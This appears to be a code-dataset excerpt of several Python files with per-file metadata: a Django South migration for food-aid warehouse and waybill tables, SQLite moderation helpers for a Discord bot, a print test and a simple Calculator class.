            ('q1', self.gf('django.db.models.fields.TextField')(db_column='store_house_code')),
            ('q2', self.gf('django.db.models.fields.DateField')(db_column='physical_inventory_closing_date')),
            ('q3', self.gf('django.db.models.fields.DateField')(db_column='actual_physical_inventory_date')),
            ('q4', self.gf('django.db.models.fields.TextField')(db_column='pl_code')),
            ('q5', self.gf('django.db.models.fields.TextField')(db_column='food_type')),
            ('q6', self.gf('django.db.models.fields.FloatField')(db_column='good_net_weight')),
            ('q7', self.gf('django.db.models.fields.FloatField')(db_column='damaged_net_weight')),
        ))
        db.send_create_signal('crs', ['PhysicalInventorySheet'])
        # Adding model 'SiteActivities'
        db.create_table('crs_siteactivities', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('q1', self.gf('django.db.models.fields.TextField')(db_column='fiscal_year_with_initials')),
            ('q2', self.gf('django.db.models.fields.TextField')(db_column='site_location')),
            ('q3', self.gf('django.db.models.fields.TextField')(db_column='site_gps_coordinates')),
            ('q4', self.gf('django.db.models.fields.TextField')(db_column='tel_no')),
            ('q5', self.gf('django.db.models.fields.TextField')(db_column='site_person_responsible')),
            ('q6', self.gf('django.db.models.fields.TextField')(db_column='type_of_activity')),
            ('q7', self.gf('django.db.models.fields.TextField')(db_column='site_code')),
        ))
        db.send_create_signal('crs', ['SiteActivities'])
        # Adding model 'Warehouse'
        db.create_table('crs_warehouse', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('q1', self.gf('django.db.models.fields.TextField')(db_column='name')),
            ('q2', self.gf('django.db.models.fields.TextField')(db_column='address')),
            ('q3', self.gf('django.db.models.fields.TextField')(db_column='gps_coordinates')),
            ('q4', self.gf('django.db.models.fields.TextField')(db_column='tel_no')),
            ('q5', self.gf('django.db.models.fields.TextField')(db_column='initials')),
        ))
        db.send_create_signal('crs', ['Warehouse'])

    def backwards(self, orm):
        # Deleting model 'WayBillSent'
        db.delete_table('crs_waybillsent')
        # Deleting model 'WayBillReceived'
        db.delete_table('crs_waybillreceived')
        # Deleting model 'SFMDistribution'
        db.delete_table('crs_sfmdistribution')
        # Deleting model 'PhysicalInventorySheet'
        db.delete_table('crs_physicalinventorysheet')
        # Deleting model 'SiteActivities'
        db.delete_table('crs_siteactivities')
        # Deleting model 'Warehouse'
        db.delete_table('crs_warehouse')

    # Frozen ORM snapshot used by South for historical model state.
    models = {
        'crs.physicalinventorysheet': {
            'Meta': {'object_name': 'PhysicalInventorySheet'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'store_house_code'"}),
            'q2': ('django.db.models.fields.DateField', [], {'db_column': "'physical_inventory_closing_date'"}),
            'q3': ('django.db.models.fields.DateField', [], {'db_column': "'actual_physical_inventory_date'"}),
            'q4': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
            'q5': ('django.db.models.fields.TextField', [], {'db_column': "'food_type'"}),
            'q6': ('django.db.models.fields.FloatField', [], {'db_column': "'good_net_weight'"}),
            'q7': ('django.db.models.fields.FloatField', [], {'db_column': "'damaged_net_weight'"})
        },
        'crs.sfmdistribution': {
            'Meta': {'object_name': 'SFMDistribution'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"}),
            'q2': ('django.db.models.fields.DateField', [], {'db_column': "'distribution_date'"}),
            'q3': ('django.db.models.fields.TextField', [], {'db_column': "'received_waybill_code'"}),
            'q4': ('django.db.models.fields.FloatField', [], {'db_column': "'distributed_oil_quantity'"}),
            'q5': ('django.db.models.fields.FloatField', [], {'db_column': "'distributed_csb_quantity'"}),
            'q6': ('django.db.models.fields.TextField', [], {'db_column': "'returned_waybill_code'"}),
            'q7': ('django.db.models.fields.IntegerField', [], {'db_column': "'returned_oil_quantity'"}),
            'q8': ('django.db.models.fields.IntegerField', [], {'db_column': "'returned_csb_quantity'"})
        },
        'crs.siteactivities': {
            'Meta': {'object_name': 'SiteActivities'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'fiscal_year_with_initials'"}),
            'q2': ('django.db.models.fields.TextField', [], {'db_column': "'site_location'"}),
            'q3': ('django.db.models.fields.TextField', [], {'db_column': "'site_gps_coordinates'"}),
            'q4': ('django.db.models.fields.TextField', [], {'db_column': "'tel_no'"}),
            'q5': ('django.db.models.fields.TextField', [], {'db_column': "'site_person_responsible'"}),
            'q6': ('django.db.models.fields.TextField', [], {'db_column': "'type_of_activity'"}),
            'q7': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"})
        },
        'crs.warehouse': {
            'Meta': {'object_name': 'Warehouse'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'name'"}),
            'q2': ('django.db.models.fields.TextField', [], {'db_column': "'address'"}),
            'q3': ('django.db.models.fields.TextField', [], {'db_column': "'gps_coordinates'"}),
            'q4': ('django.db.models.fields.TextField', [], {'db_column': "'tel_no'"}),
            'q5': ('django.db.models.fields.TextField', [], {'db_column': "'initials'"})
        },
        'crs.waybillreceived': {
            'Meta': {'object_name': 'WayBillReceived'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
            'q2': ('django.db.models.fields.TextField', [], {'db_column': "'waybill_code'"}),
            'q3': ('django.db.models.fields.TextField', [], {'db_column': "'site_code'"}),
            'q4': ('django.db.models.fields.TextField', [], {'db_column': "'receiver_name'"}),
            'q5': ('django.db.models.fields.DateField', [], {'db_column': "'received_date'"}),
            'q6': ('django.db.models.fields.TextField', [], {'db_column': "'truck_id'"}),
            'q7': ('django.db.models.fields.FloatField', [], {'db_column': "'good_net_weight'"}),
            'q8': ('django.db.models.fields.FloatField', [], {'db_column': "'damaged_net_weight'"})
        },
        'crs.waybillsent': {
            'Meta': {'object_name': 'WayBillSent'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'q1': ('django.db.models.fields.TextField', [], {'db_column': "'pl_code'"}),
            'q2': ('django.db.models.fields.TextField', [], {'db_column': "'waybill_code'"}),
            'q3': ('django.db.models.fields.DateField', [], {'db_column': "'sent_date'"}),
            'q4': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'transaction_type'"}),
            'q5': ('django.db.models.fields.TextField', [], {'null': 'True', 'db_column': "'site_code'"}),
            'q6': ('django.db.models.fields.TextField', [], {'db_column': "'sender_name'"}),
            'q7': ('django.db.models.fields.TextField', [], {'db_column': "'truck_id'"}),
            'q8': ('django.db.models.fields.TextField', [], {'db_column': "'food_type'"}),
            'q9': ('django.db.models.fields.FloatField', [], {'db_column': "'weight'"})
        }
    }

    complete_apps = ['crs']
| 63.913514
| 113
| 0.597344
| 1,331
| 11,824
| 5.108941
| 0.078137
| 0.118824
| 0.205882
| 0.294118
| 0.820294
| 0.811029
| 0.807941
| 0.807941
| 0.798235
| 0.775
| 0
| 0.00937
| 0.187669
| 11,824
| 184
| 114
| 64.26087
| 0.698594
| 0.033068
| 0
| 0.197368
| 0
| 0
| 0.522375
| 0.347841
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013158
| false
| 0
| 0.026316
| 0
| 0.059211
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2449c6d019fcce3aab6a7291982055d081dc8112
| 9,426
|
py
|
Python
|
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
resources/LOCAL_DATABASE.py
|
PyBot-Development/PyBot-v4
|
7fb821940bf43ded7d6996342b83afda4174d36e
|
[
"MIT"
] | null | null | null |
import sqlite3
try: from resources import support
except: import support
from datetime import datetime
import string
# Single module-level connection/cursor shared by every helper below.
# NOTE(review): one cursor across async handlers assumes no concurrent use
# from multiple threads — confirm the bot drives this from one event loop.
con = sqlite3.connect(f'{support.path}/data/local.db')
c = con.cursor()
async def GET_GUILD_LETTERS(guild_id):
    """Encode each digit of *guild_id* as a letter (0->A .. 9->J) and
    append '_'; used as a per-guild SQL table-name prefix."""
    letters = [string.ascii_lowercase[int(digit)] for digit in str(guild_id)]
    return "".join(letters).upper() + "_"
async def GUILD_CHECK(guild):
    """Ensure this guild's four per-guild tables exist (idempotent)."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    c.execute(f'''CREATE TABLE IF NOT EXISTS {prefix}users (id text, username text, admin text, banned text, ban_reason text, banned_by text, banned_date text, ban_duration text)''')
    c.execute(f'''CREATE TABLE IF NOT EXISTS {prefix}badwords (word text, added_by text)''')
    c.execute(f'''CREATE TABLE IF NOT EXISTS {prefix}banned_channels (id text, channel_name text, added_by text)''')
    c.execute(f'''CREATE TABLE IF NOT EXISTS {prefix}disabled_cmds (command text, added_by text)''')
async def GET_USER(guild, user):
    """Fetch the user's row, inserting a default row first if absent."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    row = c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone()
    if row is None:
        c.execute(f'INSERT INTO {prefix}users VALUES (?, ?, "0", "0", "Null", "Null", "Null", "Null")', (user.id, str(user), ))
        con.commit()
    return c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone()
async def ADMIN_CHECK(guild, user):
    """True iff the user has the admin flag set for this guild."""
    row = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND admin="1"''').fetchone()
    return row is not None
async def BANNED_CHECK(guild, user):
    """True iff the user is currently flagged banned in this guild."""
    row = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}" AND banned="1"''').fetchone()
    return row is not None
async def GET_USER_DATA(guild, user):
    """Return the user's raw row, or an explanatory string when absent."""
    row = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE id="{user.id}"''').fetchone()
    return f"User {user} not found in database." if row is None else row
async def OP_USER(guild, user):
    """Grant the admin flag, creating the row if needed. Always True."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone() is None:
        c.execute(f'INSERT INTO {prefix}users VALUES (?, ?, "1", "0", "Null", "Null", "Null", "Null")', (user.id, str(user), ))
    else:
        c.execute(f'''UPDATE {prefix}users SET admin="1" WHERE id="{user.id}"''')
    con.commit()
    return True
async def DEOP_USER(guild, user):
    """Clear the admin flag; False when the user was not an admin."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}" AND admin="1"''').fetchone() is None:
        return False
    c.execute(f'''UPDATE {prefix}users SET admin="0" WHERE id="{user.id}"''')
    con.commit()
    return True
async def BAN_USER(guild, user, reason, author):
    """Permanent ban: insert or update the row with ban metadata."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    existing = c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone()
    if existing is None:
        c.execute(f'INSERT INTO {prefix}users VALUES (?, ?, "0", "1", ?, ?, ?, "Null")', (str(user.id), str(user), str(reason), str(author.mention), str(datetime.utcnow()), ))
    else:
        c.execute(f'''UPDATE {prefix}users SET banned=?, ban_reason=?, banned_by=?, banned_date=?, ban_duration="Null" WHERE id="{user.id}"''', ("1", str(reason), str(author.mention), str(datetime.utcnow())), )
    con.commit()
    return True
async def TEMPBAN_USER(guild, user, reason, author, timestamp):
    """Temporary ban: like BAN_USER, but records *timestamp* as expiry."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    existing = c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone()
    if existing is None:
        c.execute(f'INSERT INTO {prefix}users VALUES (?, ?, "0", "1", ?, ?, ?, ?)', (user.id, str(user), str(reason), str(author.mention), str(datetime.utcnow()), str(timestamp)), )
    else:
        c.execute(f'''UPDATE {prefix}users SET banned=?, ban_reason=?, banned_by=?, banned_date=?, ban_duration="{timestamp}" WHERE id="{user.id}"''', ("1", str(reason), str(author.mention), str(datetime.utcnow())), )
    con.commit()
    return True
async def UNBAN_USER(guild, user):
    """Lift a ban and wipe its metadata; False when not banned."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}" AND banned="1"''').fetchone() is None:
        return False
    c.execute(f'''UPDATE {prefix}users SET banned="0", ban_reason="Null", banned_by="Null", banned_date="Null", ban_duration="Null" WHERE id="{user.id}"''')
    con.commit()
    return True
async def CHECK_TEMPBAN(guild, user):
    """Return True while a temp-ban is still active; otherwise unban
    (mirroring the original's unconditional fall-through) and return False."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    row = c.execute(f'''SELECT * FROM {prefix}users WHERE id="{user.id}"''').fetchone()
    if row is not None and await BANNED_CHECK(guild, user):
        duration = c.execute(f'''SELECT ban_duration FROM {prefix}users WHERE id="{user.id}"''').fetchone()[0]
        # "Null" marks a permanent ban (no expiry recorded).
        if duration != "Null" and int(duration) > int(datetime.timestamp(datetime.utcnow())):
            return True
    # BUG FIX: UNBAN_USER takes (guild, user); the original passed only
    # `user`, so every expiry raised TypeError instead of unbanning.
    await UNBAN_USER(guild, user)
    return False
async def GET_BANNED(guild):
    """List the ids of every banned user in this guild."""
    rows = c.execute(f'''SELECT id FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE banned="1"''').fetchall()
    return [row[0] for row in rows]
async def GET_OPS(guild):
    """List the ids of every admin user in this guild."""
    rows = c.execute(f'''SELECT id FROM {await GET_GUILD_LETTERS(guild.id)}users WHERE admin="1"''').fetchall()
    return [row[0] for row in rows]
async def REMOVE_BADWORD(guild, word: str):
    """Delete a bad word (case-insensitive); False when absent."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}badwords WHERE word=?''', (word.lower(), )).fetchone() is None:
        return False
    c.execute(f'''DELETE FROM {prefix}badwords WHERE word=?''', (word.lower(), ))
    con.commit()
    return True
async def ADD_BADWORD(guild, word, author):
    """Register a bad word (lowercased); False when already present."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}badwords WHERE word=?''', (word.lower(), )).fetchone() is not None:
        return False
    c.execute(f'INSERT INTO {prefix}badwords VALUES (?, ?)', (str(word.lower()), str(author), ))
    con.commit()
    return True
async def GET_BADWORDS(guild):
    """All bad words registered for this guild."""
    cursor = c.execute(f"SELECT word FROM {await GET_GUILD_LETTERS(guild.id)}badwords")
    return [entry[0] for entry in cursor]
async def WHO_CREATED_BADWORD(guild, word):
    """Who registered *word* for this guild (raises on a missing word)."""
    row = c.execute(f"SELECT added_by FROM {await GET_GUILD_LETTERS(guild.id)}badwords WHERE word=?", (word, )).fetchone()
    return row[0]
async def REMOVE_CHANNEL(guild, channel):
    """Remove a channel from the banned list; False when absent."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}banned_channels WHERE id=?''', (str(channel.id), )).fetchone() is None:
        return False
    c.execute(f'''DELETE FROM {prefix}banned_channels WHERE id=?''', (str(channel.id), ))
    con.commit()
    return True
async def ADD_CHANNEL(guild, channel, author):
    """Add a channel to the banned list; False when already present."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}banned_channels WHERE id=?''', (str(channel.id), )).fetchone() is not None:
        return False
    c.execute(f'INSERT INTO {prefix}banned_channels VALUES (?, ?, ?)', (str(channel.id), str(channel), str(author), ))
    con.commit()
    return True
async def CHANNEL_CHECK(guild, channel):
    """True if the channel is on this guild's banned-channels list."""
    row = c.execute(f"SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}banned_channels WHERE id=?", (str(channel.id), )).fetchone()
    # `is not None` rather than `!= None`: identity is the correct
    # comparison against the None singleton (PEP 8 / E711).
    return row is not None
async def GET_ALL_ADMINS(guild):
    """Full rows of every admin user in this guild."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    return c.execute(f"SELECT * FROM {prefix}users WHERE admin='1'").fetchall()
async def GET_ALL_BANNED(guild):
    """Full rows of every banned user in this guild."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    return c.execute(f"SELECT * FROM {prefix}users WHERE banned='1'").fetchall()
async def ENABLE_COMMAND(guild, cmd: str):
    """Re-enable a command (remove from disabled set); False when absent."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}disabled_cmds WHERE command=?''', (cmd, )).fetchone() is None:
        return False
    c.execute(f'''DELETE FROM {prefix}disabled_cmds WHERE command=?''', (cmd, ))
    con.commit()
    return True
async def DISABLE_COMMAND(guild, cmd: str, author):
    """Disable a command for this guild; False when already disabled."""
    prefix = await GET_GUILD_LETTERS(guild.id)
    if c.execute(f'''SELECT * FROM {prefix}disabled_cmds WHERE command=?''', (cmd, )).fetchone() is not None:
        return False
    c.execute(f'INSERT INTO {prefix}disabled_cmds VALUES (?, ?)', (str(cmd), str(author), ))
    con.commit()
    return True
async def GET_COMMANDS(guild):
    """All commands currently disabled in this guild."""
    cursor = c.execute(f"SELECT command FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds")
    return [entry[0] for entry in cursor]
async def COMMAND_CHECK(guild, cmd):
    """True if *cmd* is disabled for this guild."""
    row = c.execute(f'''SELECT * FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?''', (str(cmd), )).fetchone()
    return row is not None
async def WHO_CREATED_COMMANDS(guild, cmd: str):
    """Who disabled *cmd* for this guild (raises on a missing command)."""
    row = c.execute(f"SELECT added_by FROM {await GET_GUILD_LETTERS(guild.id)}disabled_cmds WHERE command=?", (cmd, )).fetchone()
    return row[0]
| 48.587629
| 244
| 0.664439
| 1,438
| 9,426
| 4.234353
| 0.077191
| 0.057481
| 0.120709
| 0.160946
| 0.814419
| 0.799967
| 0.795533
| 0.778124
| 0.759238
| 0.734439
| 0
| 0.003955
| 0.16847
| 9,426
| 194
| 245
| 48.587629
| 0.772901
| 0
| 0
| 0.512048
| 0
| 0.10241
| 0.454227
| 0.189138
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03012
| 0
| 0.253012
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0328ddc1b9b266e9481559cf41458c5dcfb67306
| 69
|
py
|
Python
|
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
vprint/tests/really_long_name_for_testing_truncation.py
|
xkortex/vprint
|
36735669ae2822f9a75ad9524efaa56d01c87ff5
|
[
"Unlicense"
] | null | null | null |
def test_long_name():
    """Smoke-test aprint from this intentionally long-named test module."""
    from vprint import aprint as printer
    printer('hi')
| 17.25
| 29
| 0.681159
| 10
| 69
| 4.5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217391
| 69
| 3
| 30
| 23
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.028986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
036cc4ef43181d62898f813652a7ef1ffe43bf74
| 668
|
py
|
Python
|
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class12pythoncbse-master/Chapter 4/Question12.py
|
SubrataSarkar32/college3rdsem3035
|
5cb501d0bf3742029121076cb7a2affa97d2a13b
|
[
"Apache-2.0"
] | null | null | null |
class Calculator:
    """Arithmetic accumulator: each operator updates the stored value
    in place AND returns a fresh Calculator wrapping the new value."""

    def __init__(self, value=0.0):
        # Current value, always held as a float.
        self.num = float(value)

    def __add__(self, y):
        self.num = self.num + y
        return Calculator(self.num)

    def __sub__(self, y):
        self.num = self.num - y
        return Calculator(self.num)

    def __mul__(self, y):
        self.num = self.num * y
        return Calculator(self.num)

    def __div__(self, y):
        # Python 2 division hook (kept for the original interpreter).
        self.num = self.num / y
        return Calculator(self.num)

    def __truediv__(self, y):
        # Python 3 counterpart so `/` keeps working on modern interpreters.
        self.num = self.num / y
        return Calculator(self.num)

    def __mod__(self, y):
        self.num = self.num % y
        return Calculator(self.num)

    def __pow__(self, y):
        self.num = self.num ** y
        return Calculator(self.num)

    def __str__(self):
        # BUG FIX: the original used a Python-2 `print` statement here,
        # so __str__ returned None and str(obj) raised TypeError;
        # __str__ must return the string representation.
        return str(self.num)
| 27.833333
| 35
| 0.600299
| 97
| 668
| 3.804124
| 0.195876
| 0.379404
| 0.146341
| 0.195122
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0.747967
| 0
| 0.004124
| 0.273952
| 668
| 23
| 36
| 29.043478
| 0.756701
| 0
| 0
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.043478
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.